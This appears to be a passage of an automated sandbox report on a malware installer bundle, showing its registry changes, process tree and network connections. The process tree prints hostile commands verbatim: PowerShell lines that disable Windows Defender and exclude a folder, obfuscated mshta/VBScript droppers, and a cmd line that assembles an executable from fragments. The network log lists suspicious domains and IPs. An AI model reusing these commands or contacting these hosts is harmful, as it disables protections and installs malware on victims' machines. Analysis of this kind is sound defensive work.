| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331497987788" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3228 -ip 3228
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 620
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp" /SL5="$100030,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp" /SL5="$70110,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2852 -ip 2852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 360
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaddeccc40,0x7ffaddeccc4c,0x7ffaddeccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3292,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.204.74:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.204.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 127.0.0.1:63860 | tcp | |
| N/A | 127.0.0.1:63862 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
